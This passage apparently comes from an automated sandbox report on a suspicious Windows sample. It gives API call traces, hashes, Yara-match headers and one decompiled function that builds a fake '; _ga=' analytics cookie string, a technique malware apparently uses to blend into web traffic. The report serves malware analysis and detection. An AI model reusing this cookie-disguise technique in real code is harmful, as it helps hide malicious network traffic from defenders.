                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 443303494-0
                                                                                                                                                                                                                                                                • Opcode ID: 79edb1556fdb47ffe0ed20949d1a8a8ad4642154114788c9a6481520ec46186a
                                                                                                                                                                                                                                                                • Instruction ID: 28cb4babe65e53c06b962059702630467b83852b82d8bfd3324478a03b2ccde8
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 79edb1556fdb47ffe0ed20949d1a8a8ad4642154114788c9a6481520ec46186a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D121BC7590020AEFCB10DFA8ED489AEFBF9FF59704B10456AE915E3114EB71A950CB60
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,?), ref: 0012CF59
                                                                                                                                                                                                                                                                • IsWindowEnabled.USER32(00000000), ref: 0012CF76
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?), ref: 0012CF8C
                                                                                                                                                                                                                                                                • IsWindowEnabled.USER32(00000000), ref: 0012CFA5
                                                                                                                                                                                                                                                                • GetFocus.USER32 ref: 0012CFC3
                                                                                                                                                                                                                                                                • IsWindowEnabled.USER32(00000000), ref: 0012CFCA
                                                                                                                                                                                                                                                                • SetFocus.USER32(00000000), ref: 0012CFD5
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: EnabledWindow$FocusItem
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3538048848-0
                                                                                                                                                                                                                                                                • Opcode ID: 1976900f38728d60598aa8dd9dec3a55fd9b74902e3dfc6ba084b96d5e0ac05d
                                                                                                                                                                                                                                                                • Instruction ID: fc706cf624f669148d8d080a1c3a6d8986646abd99fd7b5561518a801a921ca2
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1976900f38728d60598aa8dd9dec3a55fd9b74902e3dfc6ba084b96d5e0ac05d
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4F11C4312002316BD7056B64FC4CB6EBB2EFF8A760B050226FA5292170DF74DC219BD4
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • FindResourceW.KERNEL32(?,?,PNG,?,?,000D9C54,000D9C54,?,001526FF,?,00000000,?), ref: 001518B0
                                                                                                                                                                                                                                                                • LoadResource.KERNEL32(?,00000000,?,?,000D9C54,000D9C54,?,001526FF,?,00000000,?), ref: 001518BF
                                                                                                                                                                                                                                                                • LockResource.KERNEL32(00000000,?,000D9C54,000D9C54,?,001526FF,?,00000000,?), ref: 001518CC
                                                                                                                                                                                                                                                                • SizeofResource.KERNEL32(?,00000000,?,000D9C54,000D9C54,?,001526FF,?,00000000,?), ref: 001518DF
                                                                                                                                                                                                                                                                  • Part of subcall function 00151905: GlobalAlloc.KERNEL32(00000002,?,00000000,?,?,?,001518F1,00000000,00000000,?,000D9C54,000D9C54,?,001526FF,?,00000000), ref: 00151912
                                                                                                                                                                                                                                                                • FreeResource.KERNEL32(00000000,00000000,00000000,?,000D9C54,000D9C54,?,001526FF,?,00000000,?), ref: 001518F4
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Resource$AllocFindFreeGlobalLoadLockSizeof
                                                                                                                                                                                                                                                                • String ID: PNG
                                                                                                                                                                                                                                                                • API String ID: 169377235-364855578
                                                                                                                                                                                                                                                                • Opcode ID: 98254a267f921edb11c778f57058775371313079c64b888dbfac39531355b34a
                                                                                                                                                                                                                                                                • Instruction ID: d0914ed2b4c8ce3a7c5646e8cd35b35f7bc2cfb396b8d5dbb0bce8200562df11
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 98254a267f921edb11c778f57058775371313079c64b888dbfac39531355b34a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7A01A23A900619FB5B226B95EC48DAFBB7CEF8676271141A5FD20A7300DFB0DD0097A0
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                                			E000D1D68(WCHAR* __ecx, void* __eflags, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                                                				intOrPtr _v4;
                                                                                                                                                                                                                                                                				char _v16;
                                                                                                                                                                                                                                                                				WCHAR* _t20;
                                                                                                                                                                                                                                                                				void* _t24;
                                                                                                                                                                                                                                                                				signed int _t26;
                                                                                                                                                                                                                                                                				signed int _t27;
                                                                                                                                                                                                                                                                				signed int _t28;
                                                                                                                                                                                                                                                                				WCHAR* _t31;
                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                				_t20 = __ecx;
                                                                                                                                                                                                                                                                				E000D1984( &_v16, _t24);
                                                                                                                                                                                                                                                                				_t26 = wsprintfW(__ecx, L"%s%u", L"; _ga=", _v16);
                                                                                                                                                                                                                                                                				_t31 = ".";
                                                                                                                                                                                                                                                                				_t27 = _t26 + wsprintfW(_t20 + _t26 * 2, L"%s%u", _t31, _v4);
                                                                                                                                                                                                                                                                				_t28 = _t27 + wsprintfW(_t20 + _t27 * 2, L"%s%u", _t31, _a12);
                                                                                                                                                                                                                                                                				return wsprintfW(_t20 + _t28 * 2, L"%s%u", _t31, _a16) + _t28;
                                                                                                                                                                                                                                                                			}











                                                                                                                                                                                                                                                                0x000d1d6e
                                                                                                                                                                                                                                                                0x000d1d75
                                                                                                                                                                                                                                                                0x000d1d95
                                                                                                                                                                                                                                                                0x000d1d97
                                                                                                                                                                                                                                                                0x000d1dac
                                                                                                                                                                                                                                                                0x000d1dbe
                                                                                                                                                                                                                                                                0x000d1dd8

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551228989.00000000000D1000.00000020.00020000.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.551211478.00000000000D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.551305946.00000000000D4000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d0000_sample4.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: wsprintf
                                                                                                                                                                                                                                                                • String ID: %s%u$; _ga=
                                                                                                                                                                                                                                                                • API String ID: 2111968516-3272795577
                                                                                                                                                                                                                                                                • Opcode ID: 60eb5d3ac1c0e9c71912f1c246695e602b71bd7367b4abf55e5c024e2f7924a1
                                                                                                                                                                                                                                                                • Instruction ID: 0911ae6007f8ba7dc892df5dfd0ff500655ca3b91533e4b3d9a6838e47f4ee20
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 60eb5d3ac1c0e9c71912f1c246695e602b71bd7367b4abf55e5c024e2f7924a1
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8CF0C83290030C7BC700AB55EC41CA77F9DDF86398B410567FA1493307EB36A5188AF1
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 00133C5B
                                                                                                                                                                                                                                                                  • Part of subcall function 0011FF37: GetWindowTextLengthW.USER32(?), ref: 0011FF48
                                                                                                                                                                                                                                                                  • Part of subcall function 0011FF37: GetWindowTextW.USER32(?,00000000,00000000), ref: 0011FF5F
                                                                                                                                                                                                                                                                • InflateRect.USER32(?,?,?), ref: 00133DB5
                                                                                                                                                                                                                                                                • SetRectEmpty.USER32(?), ref: 00133DC1
                                                                                                                                                                                                                                                                • InflateRect.USER32(?,00000000,00000000), ref: 00133E6D
                                                                                                                                                                                                                                                                • OffsetRect.USER32(?,00000001,00000001), ref: 00133F2A
                                                                                                                                                                                                                                                                • IsRectEmpty.USER32(?), ref: 00133FD7
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Rect$EmptyInflateTextWindow$H_prolog3_LengthOffset
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2648887860-0
                                                                                                                                                                                                                                                                • Opcode ID: 7cd27cb59fa6fb42924c9202183a55f98eb33ea015790f8501bd1ad112e7aaea
                                                                                                                                                                                                                                                                • Instruction ID: 3874d1fdcca777c6842adaf83699c62ede13e760f7d9e453eedebbabfa250e37
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7cd27cb59fa6fb42924c9202183a55f98eb33ea015790f8501bd1ad112e7aaea
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2EF16971A102298FCF18DFA8C894AEE77B9BF48300F094179E916EB285DB34AD45CF50
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetConsoleCP.KERNEL32(002811B0,00000000,00000000), ref: 0025F0FF
                                                                                                                                                                                                                                                                • __fassign.LIBCMT ref: 0025F2DE
                                                                                                                                                                                                                                                                • __fassign.LIBCMT ref: 0025F2FB
                                                                                                                                                                                                                                                                • WriteFile.KERNEL32(?,00000010,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0025F343
                                                                                                                                                                                                                                                                • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 0025F383
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0025F42F
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FileWrite__fassign$ConsoleErrorLast
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 4031098158-0
                                                                                                                                                                                                                                                                • Opcode ID: 84610374709ff7990f60dcd84bc27d064fd52e21cf73303938423b7d0d12c9cb
                                                                                                                                                                                                                                                                • Instruction ID: fa3a86ccdd9e032b8ffb05c9eb125f309509f37088970ab4e1d9df2f1df12787
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 84610374709ff7990f60dcd84bc27d064fd52e21cf73303938423b7d0d12c9cb
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3CD1DB75D102499FCF15CFA8D9809EEBBB5EF48310F28406AE815FB242D730AA5ACF54
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • ScreenToClient.USER32(?,?), ref: 0012097E
                                                                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(000D20E8), ref: 00120B35
                                                                                                                                                                                                                                                                • __Init_thread_footer.LIBCMT ref: 00120B41
                                                                                                                                                                                                                                                                  • Part of subcall function 00118704: __CxxThrowException@8.LIBVCRUNTIME ref: 00118718
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(000D2158), ref: 00120B75
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(000D2168), ref: 00120B8B
                                                                                                                                                                                                                                                                • __Init_thread_footer.LIBCMT ref: 00120B97
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AddressInit_thread_footerProc$ClientException@8HandleModuleScreenThrow
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 4082382604-0
                                                                                                                                                                                                                                                                • Opcode ID: c4d588f8caea8225067e86edf83c6bf48e03509aaab57d2cfcb4cce9f442f601
                                                                                                                                                                                                                                                                • Instruction ID: 4d556a96f688420378c51dfb871ee11802766b317fffe6b774e5b031405d1459
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c4d588f8caea8225067e86edf83c6bf48e03509aaab57d2cfcb4cce9f442f601
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BF91B375A10626EFCB15DF68E888AADBBF4FF0C314B150269E50597661DB31ADB0CF80
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000100,?,00000000), ref: 00148115
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000020A,?,?), ref: 00148198
                                                                                                                                                                                                                                                                • IsWindow.USER32(?), ref: 001481BD
                                                                                                                                                                                                                                                                • ClientToScreen.USER32(?,?), ref: 001481CE
                                                                                                                                                                                                                                                                • IsWindow.USER32(?), ref: 001481EB
                                                                                                                                                                                                                                                                • ClientToScreen.USER32(?,?), ref: 0014821E
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ClientMessageScreenSendWindow
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2093367132-0
                                                                                                                                                                                                                                                                • Opcode ID: 04dfaceafbda3d02386b49a2875eb0bcc736342dff0d499775c9bceaa9fb8dfb
                                                                                                                                                                                                                                                                • Instruction ID: 61e955040fa6eb32afd645ac2b011b77686236d9658301885feaec6f95fa65f9
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 04dfaceafbda3d02386b49a2875eb0bcc736342dff0d499775c9bceaa9fb8dfb
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BB41A131500A00EFEB356B64CC48B7EB6B5EB19B90F20443BE896D2171EF71DC92D611
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00118BC6: __EH_prolog3_catch.LIBCMT ref: 00118BCD
                                                                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(000D2E8C,0013127C,00000000,00000000,?,?,?,0012D32B,?,?,0012BCF4,00000000,0000001C,0012D128,00000000,0012BCF4), ref: 00131173
                                                                                                                                                                                                                                                                • GetUserDefaultUILanguage.KERNEL32(?,?,0012D32B,?,?,0012BCF4,00000000,0000001C,0012D128,00000000,0012BCF4), ref: 00131184
                                                                                                                                                                                                                                                                • FindResourceExW.KERNEL32(?,00000005,?,0000FC11,?,?,0012D32B,?,?,0012BCF4,00000000,0000001C,0012D128,00000000,0012BCF4), ref: 001311C3
                                                                                                                                                                                                                                                                • FindResourceW.KERNEL32(?,?,00000005,?,?,0012D32B,?,?,0012BCF4,00000000,0000001C,0012D128,00000000,0012BCF4), ref: 001311E0
                                                                                                                                                                                                                                                                • LoadResource.KERNEL32(?,00000000,?,?,0012D32B,?,?,0012BCF4,00000000,0000001C,0012D128,00000000,0012BCF4), ref: 001311EE
                                                                                                                                                                                                                                                                  • Part of subcall function 001312BC: EnumFontFamiliesExW.GDI32(00000000,?,001312A6,?,00000000,?,?,?,?,?,?,00000000), ref: 0013132D
                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,00000000,?,?,0012D32B,?,?,0012BCF4,00000000,0000001C,0012D128,00000000,0012BCF4), ref: 0013121E
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Resource$Find$AllocDefaultEnumFamiliesFontGlobalH_prolog3_catchHandleLanguageLoadModuleUser
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1616457240-0
                                                                                                                                                                                                                                                                • Opcode ID: 282ba684dfbaa5041d2d96cd8b58bd8d0d1af62fde36051138dae76a325c68c6
                                                                                                                                                                                                                                                                • Instruction ID: 588ea093047fc5a3777ba9763b632774dd78b2b19bdab6705c8544fc5bb52ee2
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 282ba684dfbaa5041d2d96cd8b58bd8d0d1af62fde36051138dae76a325c68c6
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 72411576600206BBEB14ABA4DC4AEBB77A9EF81710F208139FD15DB290EF70DD408761
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetFocus.USER32 ref: 00131FCF
                                                                                                                                                                                                                                                                  • Part of subcall function 0011E5F8: UnhookWindowsHookEx.USER32(?), ref: 0011E622
                                                                                                                                                                                                                                                                • IsWindowEnabled.USER32(?), ref: 00131FFE
                                                                                                                                                                                                                                                                • EnableWindow.USER32(00000001,00000000), ref: 00132019
                                                                                                                                                                                                                                                                • EnableWindow.USER32(00000000,00000001), ref: 001320B8
                                                                                                                                                                                                                                                                • IsWindow.USER32(?), ref: 001320C2
                                                                                                                                                                                                                                                                • SetFocus.USER32(?), ref: 001320CD
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Window$EnableFocus$EnabledHookUnhookWindows
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2931672367-0
                                                                                                                                                                                                                                                                • Opcode ID: a143819e3e228af81aa75cdfc0da7fd1f37eb410460efa885e9139b344f2747e
                                                                                                                                                                                                                                                                • Instruction ID: b666be446a2aeeca3e1546b70eb4f70d7c40f406009791c28b2c43fa4207d638
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a143819e3e228af81aa75cdfc0da7fd1f37eb410460efa885e9139b344f2747e
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3F416A34700205EFDB1CBFA4D889B99FBA9BF45300F158169F41997262DB71E898DF81
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • IsWindow.USER32(?), ref: 00137B2C
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000146,00000000,00000000), ref: 00137B4D
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00137B61
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000146,00000000,00000000), ref: 00137B8E
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00137BA2
                                                                                                                                                                                                                                                                • __EH_prolog3.LIBCMT ref: 00137BBC
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend$H_prolog3Window
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3728102838-0
                                                                                                                                                                                                                                                                • Opcode ID: 2b149e8e075be29a45a9a2b6e9957d50b3a4fa4a0e8576e87ca9e2725e682657
                                                                                                                                                                                                                                                                • Instruction ID: f6b037af9579a90d11c1f905067ae029525ed5b3fc9cd18514f844d07f50f6bf
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2b149e8e075be29a45a9a2b6e9957d50b3a4fa4a0e8576e87ca9e2725e682657
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6C31C131601125BBDB29AB60DC4AAEFBB79FF56361F100229F405A32E1DF719D50CBA1
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • IsWindowVisible.USER32(?), ref: 00122593
                                                                                                                                                                                                                                                                • GetWindow.USER32(?,00000005), ref: 001225AA
                                                                                                                                                                                                                                                                • GetWindowRect.USER32(00000000,00000000), ref: 001225CE
                                                                                                                                                                                                                                                                  • Part of subcall function 0012840E: ScreenToClient.USER32(?,?), ref: 0012841D
                                                                                                                                                                                                                                                                  • Part of subcall function 0012840E: ScreenToClient.USER32(?,00000000), ref: 0012842A
                                                                                                                                                                                                                                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000015,00000000), ref: 001225F4
                                                                                                                                                                                                                                                                • GetWindow.USER32(00000000,00000002), ref: 001225FD
                                                                                                                                                                                                                                                                • ScrollWindow.USER32(?,?,?,?,?), ref: 00122619
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Window$ClientScreen$RectScrollVisible
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1714389229-0
                                                                                                                                                                                                                                                                • Opcode ID: c076b9c0066ce744dd36c841fb9916b8778f3bdf83add335768b5089d4982ea5
                                                                                                                                                                                                                                                                • Instruction ID: 23b7f2b100491d1ea03e07ef937cf3102372b00c1af70520dc2b8f1b44d8c423
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c076b9c0066ce744dd36c841fb9916b8778f3bdf83add335768b5089d4982ea5
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4F317A32610219AFDB11AF94EC88BBFB7B9FF89711F114019F905A7211EB74ED219B60
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • __EH_prolog3.LIBCMT ref: 00138422
                                                                                                                                                                                                                                                                  • Part of subcall function 00124A38: IsWindowEnabled.USER32(?), ref: 00124A43
                                                                                                                                                                                                                                                                • InvalidateRect.USER32(?,00000000,00000001,0000000C,001387FC), ref: 0013844E
                                                                                                                                                                                                                                                                • UpdateWindow.USER32(?), ref: 00138457
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Window$EnabledH_prolog3InvalidateRectUpdate
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 262192325-0
                                                                                                                                                                                                                                                                • Opcode ID: 48718b4e531f5b155ebdf15d2cc4ab9ba3f0c62a8c80c551973a2e117ba0177e
                                                                                                                                                                                                                                                                • Instruction ID: 47a43741a2dbd2f9ae9444696a54ef015018ef48f25cc61c22cd624d2741eeba
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 48718b4e531f5b155ebdf15d2cc4ab9ba3f0c62a8c80c551973a2e117ba0177e
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1E218971800705ABCB29EBB4DC49AAFBBB8FFA9300F10452DF05A96251DB30A941CB21
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • IsWindow.USER32(00000000), ref: 001203BE
                                                                                                                                                                                                                                                                • FindResourceW.KERNEL32(?,00000000,000D2580), ref: 001203F6
                                                                                                                                                                                                                                                                • SizeofResource.KERNEL32(?,00000000), ref: 00120408
                                                                                                                                                                                                                                                                • LoadResource.KERNEL32(?,?), ref: 00120415
                                                                                                                                                                                                                                                                • LockResource.KERNEL32(00000000), ref: 00120422
                                                                                                                                                                                                                                                                • FreeResource.KERNEL32(00000000), ref: 00120447
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Resource$FindFreeLoadLockSizeofWindow
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 4180966417-0
                                                                                                                                                                                                                                                                • Opcode ID: 617c7d9b8fc64c35ef2914244ec021be22529e2cb0bcd6dec592c040f884a0cb
                                                                                                                                                                                                                                                                • Instruction ID: 963b49b96fa77136055454835b12807f5579677e73ae408aa2a3e8e2b4c49f24
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 617c7d9b8fc64c35ef2914244ec021be22529e2cb0bcd6dec592c040f884a0cb
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 33216675A00214AFDB127FA4BC4866E7BF4EB59701F148269EA05D3212EB71CD60D751
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • ClientToScreen.USER32(?,?), ref: 0012682E
                                                                                                                                                                                                                                                                • GetWindow.USER32(?,00000005), ref: 00126837
                                                                                                                                                                                                                                                                • GetDlgCtrlID.USER32(00000000), ref: 00126846
                                                                                                                                                                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 00126874
                                                                                                                                                                                                                                                                • PtInRect.USER32(?,?,?), ref: 00126884
                                                                                                                                                                                                                                                                • GetWindow.USER32(00000000,00000002), ref: 00126891
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Window$Rect$ClientCtrlScreen
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2874268147-0
                                                                                                                                                                                                                                                                • Opcode ID: 83e2dca0bbc49365303d7204a3b80276d94be32524e903585c87723e8b9bf3c0
                                                                                                                                                                                                                                                                • Instruction ID: 167c8464757065ad3e48a1d5f6d7310de9aba983af788f80ab36b0564ab6c487
